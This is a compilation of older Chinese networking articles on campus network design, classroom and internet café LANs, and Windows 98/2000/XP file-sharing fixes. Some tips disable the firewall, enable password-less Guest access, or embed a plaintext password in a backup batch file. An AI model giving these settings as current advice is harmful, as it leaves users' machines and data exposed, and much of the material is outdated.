网络规划及设备选型

1.主干网：

从目前校园网应用的情况来看，校园网主要的性能受到了交换机包交换能力的影响；而从网络传输性能上来看，由于ATM应用还不够成熟，而快速以太网因其具有性能可靠、符合国际标准、可支持设备多、易扩充等特点，因此采用100/1000M以太网作为校园网光纤主干是性能价格比最高的选择。同时为了充分发挥校园网主服务器群的作用，决定采用高速线路与服务器连接（如：千兆以太网），从而保证了服务器具有足够的带宽为网络上的用户提供良好的服务性能。

2.主干网交换机：

由图可见，由于校园主干网承担了整个学校的网络包交换、子网划分、网络管理等重要任务，因此决定采用具有三层路由功能、包交换性能高的交换机作为主干网的节点机，它们分别分布在西区计算中心、网络管理中心、第二理科楼，东区图书馆、水电学院和西区第一教学楼。其主交换机需采用数据吞吐能力不低于7Gbps的交换机，以便使网络系统的中心交换能力有所保证。

3.第二层交换机：

各大楼的第二层交换机采用了10/100M自适应，且具有良好性能的，支持虚网划分的交换机。这样既可以适应目前学校现有的10M、100M设备混合使用的现状，又能为今后增加设备提供方便。

网络结构

如图所示，根据四川大学校园网的需求，网络主干选择千兆以太网。由于网络上同时连接着对带宽和可靠性有较高要求的设备，如：服务器、交换机等。各大楼内的主交换机(BayStack 350－24T)，通过100M的光纤与千兆以太主干网连接，学生和家属宿舍使用BayStack 310－24T直接连接到桌面。因此主干网为三个星形拓扑结构，每个星形网的核心交换机通过千兆光纤相连，整个网络在布线上是一种以双环连接为主的方式。

校园网共分成五个子网：西区计算中心子网、网络管理中心子网、第二理科楼子网、水电学院子网、东区图书馆子网。每个子网选用一台北电的Accelar 1200路由交换机作为核心交换机，它带有16个10/100M以太网接口及相应的千兆光纤口，用作核心交换机所在大楼的网络接口。同时在每个Accelar 1200交换机上再根据各子网的不同情况，分别配上1至2块8端口100Base－FX的以太网光纤接口卡，形成以100M为接入的光纤以太网络，向下通过100M光纤以太网接口与支持VLAN的10/100M自适应交换机BayStack 350－24T连接。

此外，核心交换机的10/100BaseTX还可以与校园网原来已有的、用于接入Internet的路由器连接，使整个校园网可以方便地与Internet进行信息交换。同时，在中心机房配置一台采用Optivity网管软件，可进行全面网络管理的网管工作站，用于对整个校园网的网管。

整个校园网构架完成后，可形成一个以千兆光纤为主干、覆盖全校各主要大楼的校园网。该网络通过Optivity网管工作站可以方便地对全网进行网络设备配置与监控、子网规划、三层交换管理、用户迁移、访问控制、网络流量监控、故障告警排除等操作。同时，对Internet提供了DDN、X.25、FrameRelay、PSTN等备份线路，用户远程拨号访问等功能，保证了校园网可以与Internet互联，建设自已的Web站点、E－mail服务器的能力。

主要网络设备

在该校园网中，全部选用了北电业界领先的最佳产品，包括：5台Accelar1200、1台Accelar1100、130台BayStack 310、15台BayStack350及Optivity网络管理软件。其中北电的Accelar三层路由交换机及BayStack350/450交换机的组合，可以提供良好的系统容错性，在不增加成本的基础上，具有虚拟子网的第三层交换功能，并具有良好的性能/价格比。它们与网管软件Optivity的无缝结合，可以实现对全网络的网络管理。

1. Accelar1100特性分析：

Accelar1100路由交换机系列反映了高性能网络的一种新技术——将超高速包转发与IP路由控制相结合。这种采用突破性技术的路由交换机可提供更高的带宽，具有减小广播通信影响的智能，并支持对延迟和对时间性较敏感的多媒体应用。Accelar1100系列路由交换机的主要优点是：

●带有第三层和第四层控制的千兆位性能；

●高速的Intranet支持；

●节省费用的模块化设计；

●强有力的VLAN支持；

●带有Gigabit千兆以太网；

2．BayStack 450/350特性分析：

BayStack450/350是北电网络企业网系统部今年中期新推出的BayStack全系列交换机中性能很好的一款，它具有如下主要特性：

●可以灵活选择高速上行链路；

●线速传输；

●整个堆栈的多链路群集(Multilink Trunking)；

●先进的软件功能；

●冗余的堆叠能力；

●稳健的管理。

3．Optivity——网络管理的全面解决方案：

Optivity利用其多层拓扑能力来查看网络基本结构模块——集线器、交换机、路由器和端站之间的联系，可以提供一个全面的企业梗概。它具有如下几个主要特点：

●简化网络管理；

●动态的网络查找；

●基于软件的配置；

●集成化的路由器和交换机管理；

●基于RMON的分析和性能管理；

●提前进行错误分析和故障排除；

●功能强大的管理工具及其利用；

●多平台支持。

网络特点

1.高可靠性：

主干交换机所有模块可实现热插拔；

2.高性能：

●实现了全网的三层交换；

●支持基于标准的VLAN(802.1Q)，允许多条逻辑链路运行；

●支持多层QoS级别，提供延迟极小的信道；

●支持IP广播分离和优先级，使在不引入大量广播风暴的情况下，完成企业内部的视频广播。

3.高安全性：

为了保护网络系统数据安全性，本方案中提供多种方式和层次的访问控制安全机制，可进行端到端的安全性控制，主干交换机Accelar 1200还支持IP过滤。

4.易维护性：

●主干设备可以在不影响网络正常运行的情况下进行模块/电源热插拔；

●网络设备可通过调制解调器拨号、Telnet、SNMP等方式进行远程配置及远程控制。

5.强适应性：

随着网络系统用户应用规模的不断扩大，本方案中的网络设备能方便地扩充容量，支持更多的用户和应用，并且保证网络设备的性能随着网络规模的扩大而增加。可平滑地过渡到新的网络技术，保护网络系统用户现有投资。

6.易管理性：

网络系统节点众多，地域分布广泛，高效而简便的网络管理对于用户而言是至关重要的，本方案提供了强有力的Optivity网络管理系统解决方案。

7.高度的开放性与标准化：

所有网络产品支持所有标准的网络与接口协议。

返回


经济型多媒体教育网的组建

《一键清理系统垃圾》

经济型多媒体教育网的组建

        随着计算机的普及和多媒体技术的发展，计算机辅助教学进入了一个崭新的时期，以各种结构组成的计算机教育系统拥有了越来越多的用户。任何一个多媒体教育网都应该具备管理、控制、共享和通讯四个基本功能。
    一、计算机系统
    从使用需求、投入资金、管理维护等多方面来综合考虑，一个经济型的多媒体教育网可以这样来组建：整个网络采用星型拓扑结构，所有的设备（如教师机、学生机等）连接到一个中心点，这个中心点称作网络的集线器（HUB）。将HUB与HUB串联，以增加所连接的计算机数量，满足能容纳60位学生的教育网。可以建立任何基于TCP/IP协议的网络，如对等网、WindowsNT网等。
    教师机或管理机的硬件配置：能支持Win95的多媒体计算机（多媒体部分含光驱（CD－ROM）、声卡、话筒、耳机或音箱、10M/100M网卡)。
    学生机的硬件配置：能支持Win95的计算机、普通声卡、话筒、耳机或音箱、10M/100M网卡。
    教学平台软件可以采用重庆苦丁香的LS－MENet，这是一个纯软件的多媒体教育网系统，不需要额外硬件的支持，是一个比较经济的方案。
    操作系统采用微软Win95/98，网络协议为TCP/IP协议。若安装为NT网，还必须有中文版WindowsNT4.0/5.0。
    另外还可根据自己需要安装其它实用的教学软件。
    二、多媒体教育网的安装
    1.在教师机和学生机上安装并设置网卡，安装Windows操作系统，让网络能正常工作。
    2.安装自己需要的教育软件。
    3.设定各工作站的TCP/IP地址。
进入“控制面板”下的“网络”，在“TCP/IP”协议“属性”的“配置”中指定所有的工作站与网络接口卡相关的TCP/IP地址，如“168.111.1.XX”，其中每一台的“XX”不能重复；子网掩码填“255.255.255.0”。如果已经分配好了，请忽略此步。
    4.在教师机上安装LS－MENet多媒体教育网软件。
在教师机上安装该软件时需要软件狗，将软件配套的软件狗插入到教师机的并行口(即打印机接口)上。安装时执行“SETUP.EXE”文件，正确输入软件的序列号，根据提示选择安装。
    5.在教师机上进行学生座位及IP地址设置。
重新启动计算机后，就会进入教师机软件，进入前需输入口令“nietao”，以后可以更改此口令，进入后在教师机的任务栏出现一个图标，点击该图标后，教师机软件就会打开。此时请点击“设置”按钮并选择“座位设置”项。
右边是座次表，选择对应的座次表项，然后在右边输入对应的IP地址和学生名字。在座次表中最后一个座次是预留给教师的。
当设置完成后，可以输入此座次表的班级。请按下“保存座次表”按钮，将座次表保存到默认的座次表中。最后按下“认可当前设定的座位”钮，就可以退出后重新启动该软件使座次表生效，这样学生才能进入多媒体教育网系统。
    6.在学生机上安装多媒体教育网软件。
安装时执行“SETUP.EXE”文件，正确输入软件的序列号，选择安装类型是学生机。安装时请根据提示正确选择。
    7.在学生机上设置教师机的IP地址。
当学生机启动后，在第一次运行该软件时，输入教师机所在的IP地址，请不要输入错了，否则将不能进入多媒体教育网。由于此地址一般不让学生修改，所以输入错了或需更改时，可打开LS－MENet软件安装目录下的DATA子目录内的“SrvIPAddress.DAT”文件，这是一个文本文件，修改其中的IP地址即可。
安装完后，就可以进行教学实践。这个多媒体教育网有很多有用的功能，其中主要有：——语音教学教师可将自已的讲话传给指定的一个或一组学生，适合教师在课堂上进行讲解。在教师的许可下学生也可以具有此功能。
    ——电子黑板
    教师可将自己的屏幕传送给指定的一个或一组学生（根据需要可以同时带上声音），其他学生在自己的电脑上可观看到教师对计算机的全部操作过程，此功能起到教学的作用，能够完全舍去黑板进行全电脑的教学，且学生能够更直接、生动地学习。在教师的许可下学生也可以具有此功能。
    ——监视
    教师观察指定学生的屏幕，观察其学习情况，这样老师不用离开自己的座位即可在自己的计算机上观看到每个学生对计算机的操作情况。在教师的许可下学生也可以具有此功能。
    ——远端遥控
教师可直接控制、操作任一学生的计算机（就像教师在学生机面前手把手地教学生一样）。教师控制每个学生的计算机时，使教师机和学生机运行同步，包括屏幕界面、运行情况、执行结果等做到手把手式的教学。在教师的许可下学生也可以具有此功能。

返回


经济型网吧的组建

《一键清理系统垃圾》

经济型网吧的组建

    网吧在中国早已不算什么新事物，近一段时间以来网吧越来越多。一方面是上网费用及硬件设备价格大幅下降，另一方面是广大电脑爱好者对网络的认识加深，对Internet需求更加强烈。在此，我向大家推荐一种经济型网吧组建方案。该方案突出“经济”二字，一是经营者投资较少，二是对消费者收费低廉，尤其适合学生使用。
    一、软件配置
    配置何种软件是组建网吧的首要问题，软件配置决定了所需的硬件配置和布线方案。毫无疑问，我们应该选用Win 95做为操作系统，各工作站用Novell Netware Client32 for Win95登录服务器，并通过WinGate、RideWay等虚拟网关软件来实现多机共享Modem上网。浏览器可选Netscape Communicator。
    二、硬件配置
    由于使用Win95为操作系统，故推荐硬件配置如下：
    服务器一台，为节约资金，使用普通PC机来充当服务器。具体配置为CPU：Intel Pentium 200/MMX；主板：ASUS TX97－XE；硬盘：MAXTOR钻石四代5.6G；内存：64M SDRAM；网卡：PCI BNC单口；Modem：33.6K；外置光驱、声卡、显卡、软驱、显示器任选。
    有盘工作站一台，配置为CPU：AMD K6－200；主板：福扬VP3，集成声卡；内存：32M SDRAM；硬盘：昆腾火球五代3.2G；网卡：ISA RJ45单口；光驱、显卡、软驱、显示器任选；配备打印机。
    无盘站15台：除硬盘、软驱、光驱外均同有盘站。
    其它：双绞线一箱（300米）；16口HUB一个；RJ45头32个；BNC头2个；T型头2个；50Ω电阻两个；细缆3米。
    三、布线方案
    采用星型连接：16台工作站通过双绞线连接在HUB的1—16口上，服务器通过细缆连接在HUB的BNC口上。
    四、配置选择
    在配置网吧的过程中，面临以下抉择：
    1.工作站是否配备硬盘
    毫无疑问，配备一定容量的硬盘会加快系统的运行速度，各工作站独立性强，用户可用储存空间大，可装应用软件多。但这样做投资较高，为实现成本回收必然要提高收费，对用户的吸引力会下降。无盘工作站成本低，运行效率下降也不多，因此经济型网吧应采取无盘工作站方式。
    2.工作站是否单独配备Modem上网
    每台工作站各配一台Modem，上网速度自然较快，这样做不仅成本高，而且Modem的利用率低。采用多机共享一个Modem便可以充分利用Modem的能力，提高使用效率。在实际使用中某台工作站下载软件速率在100Byte/s到2K/s之间，使用者较少时约为3.5K/s，理想状态下瞬间可达10K/s。当然有时也会出现几个字节每秒的情况，但这绝不是多人共享的结果，而是线路太繁忙。因此，在经济型网吧里，各工作站共享Modem是可行之计。另外服务器配的Modem质量可要过硬，老是掉线的话是不会有太多人愿意光顾你的网吧的。
    3.服务器是通过DDN专线上网还是普通电话线上网
    专线上网当然好了，但费用…除非你开网吧不是为谋生而是交朋友。对于网吧来说，最合适的是用普通电话线包月上网。
    五、经验技巧
    1.常用工具软件
    为创造一个良好的上网环境，常用工具软件必不可少。ZMUD：玩MUD必备，虽不鼓励大家玩物丧志，但这的确是大家所喜爱的。WinZIP：压缩&解压必备，网上大部分软件都以此格式存放。南极星中文通：浏览港台站点必备（如大名鼎鼎的超频者天堂）。有条件还可安装Richwin For Internet，这样就可以用BIG5码写东西了。地球村&东方快车：即时翻译软件同样必不可少，有了它们就可以方便地浏览英文站点了，在聊天室碰上大侃E文的家伙也不用怕了。ICQ：不用说了，这个东东已拥有数千万用户。GetRight：下载好工具。FrontPage98：主页制作工具，可以让用户制作（主要是更新）自己的主页。
    2.辅助设施
    Internet网址大全：初学者的好帮手。纸笔：方便用户记录资料、网址。快餐、饮料（？！）：解决用户的肚子问题。洗手间：呵呵，不用说了。
    3.经营策略
    收费标准，可按各地消费水平自定。例如我所在的长春，消费水平中上等，网吧收费每小时2元。同时开辟会员服务，60元一个月，300元半年，500元一年，在期限内上网时间不限。用户拷贝磁盘、打印文稿收费自定。
    以上是针对经济型网吧的一点建议，希望能给大家一点帮助

返回


局域网2000、XP、98互访解决简介

《一键清理系统垃圾》

局域网2000、XP、98互访解决简介

全面解决邻里不合　──局域网经典故障解决（1）::::
局域网最大的优势在于资源共享，但在实际使用中经常会遇到这样的问题：对方明明已经共享了各种资源，可在局域网中却无法访问它们。由于导致这种故障的可能性很多，一般新手很难在短时间之内查找出故障所在，因此在此以实例形式对局域网故障进行一个全面分析。
    1.羊虱子出在羊身上——网卡不听话
    【故障现象】一块PCI网卡，在Windows下能自动安装驱动程序，并且已正确配置了网络协议和相关参数，但在使用时总出现网络时好时坏的现象，更换其他网卡后依然存在这种问题；而这块网卡在其他计算机上一切正常。
    【分析与解决】首先确保网卡的驱动程序是正确的，最好使用网卡附带的驱动程序，或按照网卡型号到驱动之家（http://www.mydrivers.com）下载相应驱动程序。如果实在没有驱动程序的话，可以根据网卡上主芯片的厂家进行尝试性安装。
    在网卡驱动程序安装完毕之后，进入“控制面板→系统”窗口，这时在“设备管理器”下面应该能看见当前安装的网卡，要是网卡前面有一个带圆圈的黄色“!”图标，则说明系统已安装了网卡，但和其他硬件有冲突。此时有两种解决办法：一是删除或暂时禁用与网卡冲突的另一设备（如声卡），再重启试试问题能否解决，如能解决，再重装声卡驱动或更改声卡的中断号使两者不再冲突；另一种方法就是删除网卡的驱动程序然后重新安装，必要时调整网卡所占用的中断号，直到冲突不再发生为止。
    如果存在资源冲突，在“资源”标签的“冲突设备列表”中会给出与网卡发生冲突的设备以及冲突的中断号或输入输出地址，接着要手动进行资源分配。比如早期的一些网卡使用的中断地址是“3”，这和COM2串口会产生冲突，要是你的COM2串口闲置不用，可在“通讯端口→属性”中将其关闭；或在CMOS设置中将“Onboard UART Port”一项设置为“Disable”来关闭COM2串口，从而将中断地址“3”让给网卡使用。还有一些PCI网卡使用的是中断地址“10”，这和一些显卡发生冲突，可以在BIOS中将“Assign IRQ For VGA”设置为“Disable”，不给显卡分配固定的中断。
【另类网卡故障】在设备管理器中可以看到网卡型号旁边有一个黄色的感叹号，显然是驱动安装不成功，但正确的驱动安装了N遍也不行，你猜怎么着？后来发现是网卡松动了。
    2.大环境不好
    【故障现象】局域网中的计算机连接、共享都很正常，在这个网络中拷贝几兆或几十兆的文件也很正常，不过，一旦复制上百兆文件时，一会就出现“网络资源不足”的提示，然后就再也找不到“网上邻居”了。
    【分析与解决】由于计算机连接和共享都正常，说明网络连接、网络协议和软件的设置没有问题，不过由于大量拷贝资料时需要进行频繁的数据读取，这就要有一个相对平稳的传输环境，如果整个网络线路中存在干扰就会使得这种平稳环境受到破坏，出现网络故障。但集线器、路由器和交换机等网络设备对于外界的干扰不是很敏感，因此最大的干扰可能出现在网卡或网线环节上。
    对于网卡而言，要是机箱内结构比较紧凑，将网卡安装在紧挨着显卡、声卡和其他插卡的插槽中，可能导致这些插卡之间的电磁波相互干扰，从而造成拷贝大文件时出现错误提示。解决方法就是在关闭计算机之后把网卡拔下，重新插在一个离显卡或者声卡较远的插槽。
    对于网线来说，建议大家选用屏蔽线缆，这是由于它们通常都有屏蔽抗干扰层保护，可以防止外部电磁波的干扰，目前市场上的五类线缆或者是超五类线缆基本上都属于屏蔽线缆。另外，建议大家不要在计算机、网线以及集线器等网络设备附近放置电视机、音响等电器。
    3.Ping你Ping到千万遍——不通
    【故障现象】局域网中有两台计算机都能连接到其他计算机并使用对方计算机中的资源，但这两台计算机无法Ping通。
    【分析与解决】既然能连接到其他计算机，这就说明网络连接和网络协议方面不存在问题，因此主要从软件属性设置方面来考虑。由于Ping程序使用的是ICMP协议，所以这种故障多数发生在对方计算机上安装了防火墙软件，并且屏蔽了ICMP协议的时候。所以需要检查计算机的防火墙软件设置，看看是否屏蔽了ICMP协议。
另外，在Windows XP中激活了系统附带的防火墙之后，它会自动屏蔽一些常用的网络功能。比如在网络中的计算机采用ping命令来检测网络连接状况时，将会看见“Request timed out”的错误信息；但在“ICMP”标签下选中了“允许传入的回显请求”一项之后，再次运行ping命令就能得到正常的反馈信息了。
4.无法看到我和你
    【故障现象】打开“网上邻居”后，只能查看到部分计算机，无法查看到局域网中的有些计算机，甚至自己的计算机，这是怎么回事呢？
    【分析与解决】在局域网畅通的前提下，无论是不能查看本机还是网络中的其他计算机，都是由于无法查看到的计算机中没有正确安装文件和打印共享服务所致。
安装文件和打印服务时，可在控制面板中双击“网络”图标，在弹出窗口中点击“添加”按钮之后选择“服务”一项，并且在“网络服务”窗口中选取“Microsoft网络上的文件与打印机共享”。完成后在“网络”属性窗口中选择“文件及打印共享”，接着勾选“允许其他用户访问我的文件”复选框即可。安装设置好文件和打印共享服务之后需要重新启动计算机。
    另外，如果局域网中的计算机工作组设置出错也可能无法直接在某一个工作组中查看到它。比如大多数计算机的工作组设置为“office”，但有几台计算机的工作组设置为“office1”，这样当打开“office”工作组时就不能查看到“office1”工作组中的计算机，因此需要统一工作组的名称。在更改工作组名称时可在“网络”属性窗口中点击“标识”标签，分别设置好计算机的名称和工作组名称即可。为了便于区别局域网中的计算机，建议每台计算机名称按照使用者的姓名命名

           全面解决邻里不合　　──局域网经典故障解决（2）
5.你看得到我，我看不到你
    【故障现象】局域网中有两台计算机，其中A机使用Windows 98、B机使用Windows 2000，B机可以访问A机共享的资源，但A机无法访问B机共享的资源，只能单向访问，真奇怪！
    【分析与解决】对于这种只能单向访问的故障，首先需要检查在登录时是否进行了身份确认。由于Windows 98允许在登录时按下“取消”按钮或键盘上的“ESC”键跳过用户登录对话框，但这样就不能看到“网上邻居”了；如果要访问网络，必须以某一用户身份正确登录。因此只有相应许可权限的Windows 98用户才能连接到Windows 2000计算机中。
    如果使用了正常方式登录A机之后依然无法访问B机的资源，这就要检查B机的用户权限设置了。　　因为Windows 2000是真正的多用户操作系统，如果想通过网络访问Windows 2000下的资源，必须拥有Windows 2000计算机设置的用户名和密码，或者开启Guest账户(Windows 2000中的Guest是专门给来宾使用的账户，但系统默认是将其关闭的，所以需要开启)。
    在Windows 2000中开启Guest账户可右击桌面上“我的电脑”图标，接着选择“管理”，在计算机管理窗口中打开“本地用户和组”中的“用户”列表，此时可在窗口右部找到“Guest”账户。双击Guest账户之后，将“账号已停用”一项前的勾号去除即可。
    为了保证网络的安全，可以给Guest账户设置密码，并把密码告诉允许访问的用户。
    如果Windows 98无法访问Windows XP计算机也可以参照上述方法激活Guest账户。
    6.只让你看到我
    【故障现象】在“网上邻居”窗口中明明没有看见某一共享文件夹，但别人却可以进入这个共享文件夹，这是为什么呢？
    【分析与解决】局域网中共享文件夹和打印机是提供给所有用户使用的，如果仅仅想将一个文件夹或者是打印机共享给部分用户使用，就需要将共享资源隐藏起来。将文件夹、驱动器或打印机设置为共享属性时，如果在共享名称后面加上一个美元符号“&#36;”，那么这个共享名称就不会出现在其他计算机的网上邻居中，这样可以将共享的资源对外界隐藏起来。在使用这些资源时，只要在“地址”输入框中输入“\\计算机名称\共享名称&#36;”就能访问被隐藏的内容了。比如将局域网中名称为“IBM”计算机中的D盘设置为共享隐藏属性（D&#36;），这时在其他计算机中打开网上邻居窗口，并在“地址”输入框中键入“\\ibm\d&#36;”，确认之后就可以看见这个隐藏盘符中的所有资源了。
    7.计算机互访总结
    两台机器互相访问的四项基本原则：
    ①双方计算机打开，且设置了共享资源；
    ②双方的计算机添加了“文件和打印共享”服务；
    ③双方都正确设置了网内IP地址，且必须在一个网段中（双方的IP地址的前三位必须相同，仅仅是尾数不同，如都是192.168.0.X）；
    ④双方的计算机中都关闭了防火墙。
    Windows XP与Windows 2000的互访
    默认状态下Windows XP和Windows 2000对Guest账户都是停用的。可以让双方都启用Guest账户，如果对该账户都没有加上密码，则双方都可以很顺利地看到对方的共享资源了；如果Windows 2000一方对Guest账户加了密码，则Windows XP访问Windows 2000的共享资源时，就必须正确输入这个密码才可以访问。如果在不知道对方密码的情况下反复试探，在进行了一定次数的试探之后，Windows 2000的账户锁定策略会自动锁定它的Guest账户，此时虽然Windows 2000的Guest账户处于启用状态，但在Windows XP下双击Windows 2000的机器名时，仍然会出现无法看到对方共享目录的现象。在这种情况下，惟一的办法就是在Windows 2000下手工解除对Guest账户的锁定：打开控制面板，双击“用户和密码”，点击“高级”标签中的“高级”按钮，在“本地用户和组”的右边窗口中，双击“Guest”用户，去掉“账户已锁定”前面的勾。
    Windows 98与Windows 2000/XP的互访
    在满足了“两台机器互相访问的四项基本原则“之后，Windows 2000/XP的用户应该能访问到Windows 98用户计算机中的共享资源了，但此时Windows 98的用户可能还不能访问Windows 2000/XP用户的计算机，需要Windows 2000/XP开启Guest账户或设置一账户和密码。Windows 98的用户访问Windows 2000/XP的共享资源时，如果出现需要输入密码的对话框，有两种情况：1.Windows 98方当前的登录用户名（打开“开始”菜单，在“注销”选项后面跟的就是）不是Windows 2000/XP方的一个用户。比如Windows 98方是以用户名“chen”登录的，但在Windows 2000/XP的所有用户中，根本没有“chen”这个账户，在这种情况下，应该在密码框中填入对方的Guest用户的密码后“确定”。2.Windows 98方当前所使用的登录用户名存在于Windows 2000/XP方的用户群中，则必须在这个密码框中输入Windows 2000/XP下该账户的密码（必须通过询问对方才可以知道）。
小弟对98与XP的互访问题还要加一点。
还要把XP里控制面板中管理工具中的本地安全策略中的用户权利指派中的一项是拒绝从网络上访问这台计算机，点右键先属性在里面把guest删除。
再有就是在2000与XP中都没有netbeui这个协议再加上就会万无一失了


局域网加速一些问题以及心得体会

《一键清理系统垃圾》

局域网加速一些问题以及心得体会

取消防火墙

    如果你启用了Windows XP中防火墙，且共享了驱动器，那有可能别人无法在“网络邻居”中浏览共享驱动器，这时可以右击“本地连接”，选择“属性”，再单击“高级”标签，单击“配置”按钮，在打开的窗口中选中“关闭（不推荐）”项即可。因为我们的局域网电脑本身就接在路由器上，可以考虑在上面设置防火墙。这样局域网内的机器不会受到外界的攻击，但是局域网内的机器访问也会快一些。（点击查看更多软件使用技巧）

    多系统相互快速访问

    如果你发现Windows 2000机器访问Windows 98机器特别慢，可以在机器上按下Win+R，输入“regedt32”，在“注册表编辑器”中找到[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace]，在该分支下找到并删除掉{D6277990-4C6A-11CF-8D87-00AA0060F5BF}键，以后双击98同事的机器将会很快。

    快速备份/更新数据

    如果你经常需要将数据备份到局域网内的某文件服务器上，是不是再在本地硬盘上选中文件，然后切换到文件服务器上粘贴？这样就太麻烦了。事实上，我们只要知道文件服务器的名字（如file_bck），并知道其用户名（如user）和密码（如123456），则可以现在我们只要运行一个批处理文件就可以了，此批处理文件内容如下：

    set source=d:\work

    set dest=\\file_bck\backup

    net use \\file_bck\IPC$ "1234" /user:"user"

    xcopy %source% %dest% /e /v /r /y /z

    将其保存为batchcopy.bat，以后只要双击此bat文件将会将d:\work所有文件备份到\\file_bck\backup下。

    快速映射盘符

    打开共享机器的根文件夹，如\\homepc，再选中相应的文件夹，右击，选择“映射网络驱动器”命令，即可立即把该文件夹映射成盘符。如果直接选择“工具→映射网络驱动器”则需要我们选择映射路径。

    取消不用的网络驱动器

    如果你映射了网络驱动器，日后不再使用了，请务必打开“资源管理器”，再单击“工具→断开网络驱动器”命令，然后在所示的窗口中取消相应的驱动器即可。否则每次开机时就会自动映射此盘，也会占用较多的系统资源，从而让局域网访问速度变慢。


局域网经典故障解决

《一键清理系统垃圾》

局域网经典故障解决

局域网最大的优势在于资源共享，但在实际使用中经常会遇到这样的问题：对方明明已经共享了各种资源，可在局域网中却无法访问它们。由于导致这种故障的可能性很多，一般新手很难在短时间之内查找出故障所在，因此在此以实例形式对局域网故障进行一个全面分析。
    1.羊虱子出在羊身上——网卡不听话
    【故障现象】一块PCI网卡，在Windows下能自动安装驱动程序，并且已正确配置了网络协议和相关参数，但在使用时总出现网络时好时坏的现象，更换其他网卡后依然存在这种问题；而这块网卡在其他计算机上一切正常。
    【分析与解决】首先确保网卡的驱动程序是正确的，最好使用网卡附带的驱动程序，或按照网卡型号到驱动之家（http://www.mydrivers.com）下载相应驱动程序。如果实在没有驱动程序的话，可以根据网卡上主芯片的厂家进行尝试性安装。
    在网卡驱动程序安装完毕之后，进入“控制面板→系统”窗口，这时在“设备管理器”下面应该能看见当前安装的网卡，要是网卡前面有一个带圆圈的黄色“!”图标，则说明系统已安装了网卡，但和其他硬件有冲突。此时有两种解决办法：一是删除或暂时禁用与网卡冲突的另一设备（如声卡），再重启试试问题能否解决，如能解决，再重装声卡驱动或更改声卡的中断号使两者不再冲突；另一种方法就是删除网卡的驱动程序然后重新安装，必要时调整网卡所占用的中断号，直到冲突不再发生为止。
    如果存在资源冲突，在“资源”标签的“冲突设备列表”中会给出与网卡发生冲突的设备以及冲突的中断号或输入输出地址，接着要手动进行资源分配。比如早期的一些网卡使用的中断地址是“3”，这和COM2串口会产生冲突，要是你的COM2串口闲置不用，可在“通讯端口→属性”中将其关闭；或在CMOS设置中将“Onboard UART Port”一项设置为“Disable”来关闭COM2串口，从而将中断地址“3”让给网卡使用。还有一些PCI网卡使用的是中断地址“10”，这和一些显卡发生冲突，可以在BIOS中将“Assign IRQ For VGA”设置为“Disable”，不给显卡分配固定的中断。
    【另类网卡故障】在设备管理器中可以看到网卡型号旁边有一个黄色的感叹号，显然是驱动安装不成功，但正确的驱动安装了N遍也不行，你猜怎么着？后来发现是网卡松动了。
    2.大环境不好
    【故障现象】局域网中的计算机连接、共享都很正常，在这个网络中拷贝几兆或几十兆的文件也很正常，不过，一旦复制上百兆文件时，一会就出现“网络资源不足”的提示，然后就再也找不到“网上邻居”了。
    【分析与解决】由于计算机连接和共享都正常，说明网络连接、网络协议和软件的设置没有问题，不过由于大量拷贝资料时需要进行频繁的数据读取，这就要有一个相对平稳的传输环境，如果整个网络线路中存在干扰就会使得这种平稳环境受到破坏，出现网络故障。但集线器、路由器和交换机等网络设备对于外界的干扰不是很敏感，因此最大的干扰可能出现在网卡或网线环节上。
    对于网卡而言，要是机箱内结构比较紧凑，将网卡安装在紧挨着显卡、声卡和其他插卡的插槽中，可能导致这些插卡之间的电磁波相互干扰，从而造成拷贝大文件时出现错误提示。解决方法就是在关闭计算机之后把网卡拔下，重新插在一个离显卡或者声卡较远的插槽。
    对于网线来说，建议大家选用屏蔽线缆，这是由于它们通常都有屏蔽抗干扰层保护，可以防止外部电磁波的干扰，目前市场上的五类线缆或者是超五类线缆基本上都属于屏蔽线缆。另外，建议大家不要在计算机、网线以及集线器等网络设备附近放置电视机、音响等电器。
    3.Ping你Ping到千万遍——不通
    【故障现象】局域网中有两台计算机都能连接到其他计算机并使用对方计算机中的资源，但这两台计算机无法Ping通。
    【分析与解决】既然能连接到其他计算机，这就说明网络连接和网络协议方面不存在问题，因此主要从软件属性设置方面来考虑。由于Ping程序使用的是ICMP协议，所以这种故障多数发生在对方计算机上安装了防火墙软件，并且屏蔽了ICMP协议的时候。所以需要检查计算机的防火墙软件设置，看看是否屏蔽了ICMP协议。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:40　　 标题: 局域网经典故障解决

另外，在Windows XP中激活了系统附带的防火墙之后，它会自动屏蔽一些常用的网络功能。比如在网络中的计算机采用ping命令来检测网络连接状况时，将会看见“Request timed out”的错误信息；但在“ICMP”标签下选中了“允许传入的回显请求”一项之后，再次运行ping命令就能得到正常的反馈信息了。
4.无法看到我和你
    【故障现象】打开“网上邻居”后，只能查看到部分计算机，无法查看到局域网中的有些计算机，甚至自己的计算机，这是怎么回事呢？
    【分析与解决】在局域网畅通的前提下，无论是不能查看本机还是网络中的其他计算机，都是由于无法查看到的计算机中没有正确安装文件和打印共享服务所致。
安装文件和打印服务时，可在控制面板中双击“网络”图标，在弹出窗口中点击“添加”按钮之后选择“服务”一项，并且在“网络服务”窗口中选取“Microsoft网络上的文件与打印机共享”。完成后在“网络”属性窗口中选择“文件及打印共享”，接着勾选“允许其他用户访问我的文件”复选框即可。安装设置好文件和打印共享服务之后需要重新启动计算机。
    另外，如果局域网中的计算机工作组设置出错也可能无法直接在某一个工作组中查看到它。比如大多数计算机的工作组设置为“office”，但有几台计算机的工作组设置为“office1”，这样当打开“office”工作组时就不能查看到“office1”工作组中的计算机，因此需要统一工作组的名称。在更改工作组名称时可在“网络”属性窗口中点击“标识”标签，分别设置好计算机的名称和工作组名称即可。为了便于区别局域网中的计算机，建议每台计算机名称按照使用者的姓名命名。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:41　　 标题: 局域网经典故障解决

用“折半查找”法缩小网络故障范围
    折半步骤一：确定是硬件问题还是软件问题
    首先，在开机状态下观察网卡指示灯颜色：如果为绿色，表明线路畅通；若为黄色，表明线路不通(不同型号网卡指示灯的状态显示不一样，平时要注意观察)。若显示不通，要用测线仪测试网线，同时检查网卡是否有问题。一般情况下网线不通的几率很高，网卡坏的几率较小。如果排除了硬件故障，则进行步骤二。
    折半步骤二：判断是否为本机问题
    不能上网一般都是本机故障引起的，个别时候可能是由于校园网交换设备或代理服务器出现了问题。确定是否本机出现问题的简便方法是询问网管和其他同事能否上网。如若判断为本机问题，请进行步骤三。
